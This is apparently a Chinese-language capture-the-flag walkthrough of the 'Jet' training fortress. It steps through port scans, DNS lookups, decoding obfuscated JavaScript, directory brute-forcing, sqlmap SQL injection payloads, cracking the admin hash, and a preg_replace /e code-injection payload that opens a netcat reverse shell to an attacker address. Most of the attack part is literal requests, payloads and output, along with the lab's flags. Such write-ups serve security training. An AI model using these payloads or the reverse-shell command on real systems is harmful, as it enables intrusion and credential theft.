Jet
Jet.com is currently looking for Security Engineers in the USA.
Jet’s mission is to become the smartest way to shop and save on pretty much anything. Combining a revolutionary pricing engine, a world-class technology and fulfillment platform, and incredible customer service, we’ve set out to create a new kind of e-commerce. At Jet, we’re passionate about empowering people to live and work brilliant.
We need super smart engineers from all levels to help us build one of the best engineered e-commerce platforms in the world (big talk we know, but that is our goal!). Our engineers combine creativity, curiosity, and drive to continuously perfect and revolutionize Jet from the inside out. We are looking to bring more intellectually curious engineers who are passionate about technology in general (Jet is a technology first company and prides itself on its culture of learning and knowledge sharing and we want all our engineers to be as passionate as we are!)
The Environment
Our infrastructure is largely built on Microsoft Windows. We have a hybrid configuration with on premise servers and cloud based servers using Microsoft Azure with a large number of additional technologies and middleware. We support three warehouses, a call center, corporate headquarters, and the development environment in the cloud. Our team uses a mix of Windows, Apple, and some Linux for our systems management platforms and cutting edge network equipment. About 50% of the development platform runs on Linux and the rest Windows.
Jet.com 目前正在美国寻找安全工程师。
Jet 的使命是成为购物和节省开销的最智能方式,几乎可以在任何事物上。结合了革命性的定价引擎、世界级的技术及履行平台,以及难以置信的客户服务,我们旨在创造一种全新的电子商务体验。在 Jet,我们热衷于赋予权力给人们,让他们能够更加出色地生活和工作。
我们需要从各个级别的超级聪明的工程师来帮助我们构建世界上最优秀的电子商务平台之一(我们知道这话听起来很夸张,但这就是我们的目标!)。我们的工程师结合创造力、好奇心和动力,不断地完善和革新 Jet,从内而外。我们希望吸引更多对技术充满好奇心的工程师,他们对技术充满热情(Jet 是一家技术优先的公司,并以其学习和知识共享的文化自豪,我们希望我们所有的工程师都像我们一样充满热情!)
环境
我们的基础设施主要建立在 Microsoft Windows 上。我们有一个混合配置,包括本地服务器和使用 Microsoft Azure 的云服务器,还使用了大量其他技术和中间件。我们支持三个仓库、一个呼叫中心、企业总部和云中的开发环境。我们的团队使用 Windows、Apple 和一些 Linux 作为我们的系统管理平台,并使用最先进的网络设备。大约 50% 的开发平台运行在 Linux 上,其余的运行在 Windows 上。
ENTRY POINT
10.13.37.10
First of all
Nmap scan report for 10.13.37.10
Host is up (0.44s latency).
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
......
Open 10.13.37.10:22
Open 10.13.37.10:53
Open 10.13.37.10:80
Open 10.13.37.10:5555
Open 10.13.37.10:7777
Open 10.13.37.10:9201
Nmap scan report for 10.13.37.10
Host is up (0.40s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 62:f6:49:80:81:cf:f0:07:0e:5a:ad:e9:8e:1f:2b:7c (RSA)
| 256 54:e2:7e:5a:1c:aa:9a:ab:65:ca:fa:39:28:bc:0a:43 (ECDSA)
|_ 256 93:bc:37:b7:e0:08:ce:2d:03:99:01:0a:a9:df:da:cd (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx on Debian!
|_http-server-header: nginx/1.10.3 (Ubuntu)
5555/tcp open freeciv?
| fingerprint-strings:
| DNSVersionBindReqTCP, GenericLines, GetRequest, adbConnect:
| enter your name:
| [31mMember manager!
| edit
| change name
| gift
| exit
| NULL:
| enter your name:
| SMBProgNeg:
| enter your name:
| [31mMember manager!
| edit
| change name
| gift
| exit
| invalid option!
| ......
7777/tcp open cbt?
| fingerprint-strings:
| Arucer, DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, Socks5, X11Probe:
| --==[[Spiritual Memo]]==--
| Create a memo
| Show memo
| Delete memo
| Can't you read mate?
| NULL:
| --==[[Spiritual Memo]]==--
| Create a memo
| Show memo
|_ Delete memo
9201/tcp open http BaseHTTPServer 0.3 (Python 2.7.12)
Introduction
Lift off with this introductory fortress from Jet! Featuring interesting web vectors and challenges, this fortress is perfect for those getting started.
用这个 Jet 的入门级堡垒起飞吧!特色包括有趣的网页向量和挑战,这个堡垒非常适合刚开始的人。
Connect
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx on Debian!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx on Debian!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working on Debian. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a></p>
<p>
Please use the <tt>reportbug</tt> tool to report bugs in the
nginx package with Debian. However, check <a
href="http://bugs.debian.org/cgi-bin/pkgreport.cgi?ordering=normal;archive=0;src=nginx;repeatmerged=0">existing
bug reports</a> before reporting a new bug.
</p>
<p><em>Thank you for using debian and nginx.</em></p>
<b>JET{s4n1ty_ch3ck}</b>
</body>
</html>
JET{s4n1ty_ch3ck}
Digging in
首先,尝试使用 DNS 服务对本地地址进行反查
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> @10.13.37.10 -x 10.13.37.10
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 15595
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;10.37.13.10.in-addr.arpa. IN PTR
;; AUTHORITY SECTION:
37.13.10.in-addr.arpa. 604800 IN SOA www.securewebinc.jet. securewebinc.jet. 3 604800 86400 2419200 604800
;; Query time: 283 msec
;; SERVER: 10.13.37.10#53(10.13.37.10) (UDP)
;; WHEN: Wed Mar 06 15:44:00 CST 2024
;; MSG SIZE rcvd: 109
将域名添加到 /etc/hosts
记录中
10.13.37.10 www.securewebinc.jet
10.13.37.10 securewebinc.jet
然后进行访问
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>SecureWeb Inc. - We design secure websites</title>
......
<section id="contact">
<div class="container">
<div class="row">
<div class="col-lg-8 mx-auto text-center">
<h2 class="section-heading">Let's Get In Touch!</h2>
<hr class="my-4">
<p class="mb-5">Ready to start your next project with us? That's great! Give us a call and we will get back to you as soon as possible!</p>
</div>
</div>
<div class="row">
<div class="col-lg-4 ml-auto text-center">
<i class="fa fa-phone fa-3x mb-3 sr-contact"></i>
<p>123-456-6789</p>
</div>
<div class="col-lg-4 mr-auto text-center">
<i class="fa fa-flag-checkered fa-3x mb-3 sr-contact"></i>
<p>JET{w3lc0me_4nd_h@v3_fun!}</p>
</div>
</div>
</div>
</section>
......
</body>
</html>
JET{w3lc0me_4nd_h@v3_fun!}
Going Deeper
访问网页
在开发者工具的调试工具中,发现一个脚本 http://www.securewebinc.jet/js/secure.js
eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,83,116,97,116,115,40,41,10,123,10,32,32,32,32,36,46,97,106,97,120,40,123,117,114,108,58,32,34,47,100,105,114,98,95,115,97,102,101,95,100,105,114,95,114,102,57,69,109,99,69,73,120,47,97,100,109,105,110,47,115,116,97,116,115,46,112,104,112,34,44,10,10,32,32,32,32,32,32,32,32,115,117,99,99,101,115,115,58,32,102,117,110,99,116,105,111,110,40,114,101,115,117,108,116,41,123,10,32,32,32,32,32,32,32,32,36,40,39,35,97,116,116,97,99,107,115,39,41,46,104,116,109,108,40,114,101,115,117,108,116,41,10,32,32,32,32,125,44,10,32,32,32,32,101,114,114,111,114,58,32,102,117,110,99,116,105,111,110,40,114,101,115,117,108,116,41,123,10,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,114,101,115,117,108,116,41,59,10,32,32,32,32,125,125,41,59,10,125,10,103,101,116,83,116,97,116,115,40,41,59,10,115,101,116,73,110,116,101,114,118,97,108,40,102,117,110,99,116,105,111,110,40,41,123,32,103,101,116,83,116,97,116,115,40,41,59,32,125,44,32,49,48,48,48,48,41,59));
对脚本中的 ASCII 数据进行解码,得到
function getStats()
{
$.ajax({url: "/dirb_safe_dir_rf9EmcEIx/admin/stats.php",
success: function(result){
$('#attacks').html(result)
},
error: function(result){
console.log(result);
}});
}
getStats();
setInterval(function(){ getStats(); }, 10000);
尝试访问
1709711699
尝试进行目录爆破
[15:56:33] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/auth.php -> login.php
[15:56:38] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/bower_components -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/bower_components/
[15:56:38] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/build -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/build/
[15:56:48] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/dashboard.php -> login.php
[15:56:49] 200 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/db.php
[15:56:51] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/dist -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dist/
[15:56:53] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/email.php -> login.php
[15:57:06] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/index.php -> login.php
[15:57:13] 200 - 3KB - /dirb_safe_dir_rf9EmcEIx/admin/login.php
[15:57:15] 302 - 0B - /dirb_safe_dir_rf9EmcEIx/admin/logout.php -> login.php
[15:57:35] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/plugins -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/plugins/
[15:57:59] 301 - 194B - /dirb_safe_dir_rf9EmcEIx/admin/uploads -> http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/uploads/
访问 /dirb_safe_dir_rf9EmcEIx/admin/login.php
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Secureweb Inc. | Log in</title>
<!-- Tell the browser to be responsive to screen width -->
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
<!-- Bootstrap 3.3.7 -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/bootstrap/dist/css/bootstrap.min.css">
<!-- Font Awesome -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/font-awesome/css/font-awesome.min.css">
<!-- Ionicons -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/Ionicons/css/ionicons.min.css">
<!-- Theme style -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/dist/css/AdminLTE.min.css">
<!-- iCheck -->
<link rel="stylesheet" href="/dirb_safe_dir_rf9EmcEIx/admin/plugins/iCheck/square/blue.css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="/dirb_safe_dir_rf9EmcEIx/admin/js/html5shiv.min.js"></script>
<script src="/dirb_safe_dir_rf9EmcEIx/admin/js/respond.min.js"></script>
<![endif]-->
</head>
<body class="hold-transition login-page">
<div class="login-box">
<div class="login-logo">
<b>Secureweb Inc.</b>
</div>
<!-- /.login-logo -->
<div class="login-box-body">
<p class="login-box-msg">
Authorized use only.
<br>
<span class="text-danger">
</span>
</p>
<!-- JET{s3cur3_js_w4s_not_s0_s3cur3_4ft3r4ll} -->
<form action="/dirb_safe_dir_rf9EmcEIx/admin/dologin.php" method="post">
<div class="form-group has-feedback">
<input name="username" type="username" class="form-control" placeholder="Username">
<span class="glyphicon glyphicon-envelope form-control-feedback"></span>
</div>
<div class="form-group has-feedback">
<input name="password" type="password" class="form-control" placeholder="Password">
<span class="glyphicon glyphicon-lock form-control-feedback"></span>
</div>
<div class="row">
<div class="col-xs-8">
<div class="checkbox icheck">
<label>
<input type="checkbox"> Remember Me
</label>
</div>
</div>
<!-- /.col -->
<div class="col-xs-4">
<button type="submit" class="btn btn-primary btn-block btn-flat">Sign In</button>
</div>
<!-- /.col -->
</div>
</form>
</div>
<!-- /.login-box-body -->
</div>
<!-- /.login-box -->
<!-- jQuery 3 -->
<script src="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/jquery/dist/jquery.min.js"></script>
<!-- Bootstrap 3.3.7 -->
<script src="/dirb_safe_dir_rf9EmcEIx/admin/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
<!-- iCheck -->
<script src="/dirb_safe_dir_rf9EmcEIx/admin/plugins/iCheck/icheck.min.js"></script>
<script>
$(function () {
$('input').iCheck({
checkboxClass: 'icheckbox_square-blue',
radioClass: 'iradio_square-blue',
increaseArea: '20%' // optional
});
});
</script>
</body>
</html>
JET{s3cur3_js_w4s_not_s0_s3cur3_4ft3r4ll}
Bypassing Authentication
对 http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/login.php
登陆界面进行 sql 注入探测
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1327 HTTP(s) requests:
---
Parameter: username (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=aqFD'||(SELECT 0x63754e76 WHERE 3730=3730 AND (SELECT 3989 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(3989=3989,1))),0x717a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=aqFD'||(SELECT 0x4e5a4c63 WHERE 2250=2250 AND (SELECT 1236 FROM (SELECT(SLEEP(5)))bfpF))||'&password=
---
将数据库提取出来
available databases [2]:
[*] information_schema
[*] jetadmin
提取出来数据库中的表
Database: jetadmin
[1 table]
+-------+
| users |
+-------+
将表中的数据提取出来
Database: jetadmin
Table: users
[1 entry]
+----+------------------------------------------------------------------+----------+
| id | password | username |
+----+------------------------------------------------------------------+----------+
| 1 | 97114847aa12500d04c0ef3aa6ca1dfd8fca7f156eeb864ab9b0445b235d5084 | admin |
+----+------------------------------------------------------------------+----------+
使用 CrackStation 进行破解
Hash | Type | Result |
---|---|---|
97114847aa12500d04c0ef3aa6ca1dfd8fca7f156eeb864ab9b0445b235d5084 | sha256 | Hackthesystem200 |
得到凭据
admin:Hackthesystem200
使用上面得到的凭据成功登录进系统
在系统中就能得到 flag
JET{sQl_1nj3ct1ons_4r3_fun!}
Command
对系统可交互的功能进行探测,发现可用的只有邮件功能
对传输的数据进行测试
POST /dirb_safe_dir_rf9EmcEIx/admin/email.php HTTP/1.1
Host: www.securewebinc.jet
Content-Length: 332
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.securewebinc.jet
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dashboard.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h8bqg9jk7kegf983s2of6v7i35
Connection: close
swearwords%5B%2Ffuck%2Fi%5D=make+love&swearwords%5B%2Fshit%2Fi%5D=poop&swearwords%5B%2Fass%2Fi%5D=behind&swearwords%5B%2Fdick%2Fi%5D=penis&swearwords%5B%2Fwhore%2Fi%5D=escort&swearwords%5B%2Fasshole%2Fi%5D=bad+person&to=admin%40admin.com&subject=admin%40admin.com&message=%3Cp%3Eadmin%40admin.com%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1
对 POST 的数据解码进行分析
swearwords[/fuck/i]=make love
&swearwords[/shit/i]=poop
&swearwords[/ass/i]=behind
&swearwords[/dick/i]=penis
&swearwords[/whore/i]=escort
&swearwords[/asshole/i]=bad person
&to=admin@admin.com
&subject=admin
@admin.com&message=<p>admin@admin.com<br></p>
&_wysihtml5_mode=1
可以猜测使用到了 preg_replace
函数对数据进行分析,尝试构建攻击数据包
swearwords[/fuck/ie]=system('whoami')&swearwords[/shit/i]=poop&swearwords[/ass/i]=behind&swearwords[/dick/i]=penis&swearwords[/whore/i]=escort&swearwords[/asshole/i]=bad person&to=a@a.com&subject=test&message=swearwords[/fuck/]
得到
www-data
swearwords[/www-data/]
尝试进行反弹 shell
POST /dirb_safe_dir_rf9EmcEIx/admin/email.php?shell=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+10.10.16.2+9999+>/tmp/f HTTP/1.1
Host: www.securewebinc.jet
Content-Length: 233
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.securewebinc.jet
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.securewebinc.jet/dirb_safe_dir_rf9EmcEIx/admin/dashboard.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=h8bqg9jk7kegf983s2of6v7i35
Connection: close
swearwords[/fuck/ie]=system($_GET["shell"])&swearwords[/shit/i]=poop&swearwords[/ass/i]=behind&swearwords[/dick/i]=penis&swearwords[/whore/i]=escort&swearwords[/asshole/i]=bad person&to=a@a.com&subject=test&message=swearwords[/fuck/]
成功得到回连的 shell
┌─[randark@parrot]─[~]
└──╼ $ pwncat-cs -lp 9999
[17:23:16] Welcome to pwncat 🐈!
[17:31:24] received connection from 10.13.37.10:49936
[17:31:33] 10.13.37.10:49936: registered new host w/ db
(local) pwncat$ back
(remote) www-data@jet:/var/www/html/dirb_safe_dir_rf9EmcEIx/admin$ whoami
www-data
(remote) www-data@jet:/var/www/html/dirb_safe_dir_rf9EmcEIx/admin$ ls -lh
total 112K
-rw-r--r-- 1 root root 33 Dec 20 2017 a_flag_is_here.txt
-rwxr-x--- 1 root www-data 157 Jan 3 2018 auth.php
-rwxr-x--- 1 root www-data 39 Dec 20 2017 badwords.txt
drwxr-x--- 32 root www-data 4.0K Dec 20 2017 bower_components
drwxr-x--- 6 root www-data 4.0K Oct 9 2017 build
-rwxr-x--- 1 root www-data 82 Dec 20 2017 conf.php
-rwxr-x--- 1 root www-data 44K Dec 27 2017 dashboard.php
-rwxr-x--- 1 root www-data 600 Dec 20 2017 db.php
drwxr-x--- 5 root www-data 4.0K Oct 9 2017 dist
-rwxr-x--- 1 root www-data 820 Dec 27 2017 dologin.php
-rwxr-x--- 1 root www-data 2.9K Dec 27 2017 email.php
-rwxr-x--- 1 root www-data 43 Dec 20 2017 index.php
drwxr-x--- 2 root www-data 4.0K Dec 20 2017 js
-rwxr-x--- 1 root www-data 3.6K Dec 20 2017 login.php
-rwxr-x--- 1 root www-data 98 Dec 20 2017 logout.php
drwxr-x--- 10 root www-data 4.0K Dec 20 2017 plugins
-rwxr-x--- 1 root www-data 21 Nov 14 2017 stats.php
drwxrwxrwx 2 root www-data 4.0K Mar 3 13:38 uploads
JET{pr3g_r3pl4c3_g3ts_y0u_pwn3d}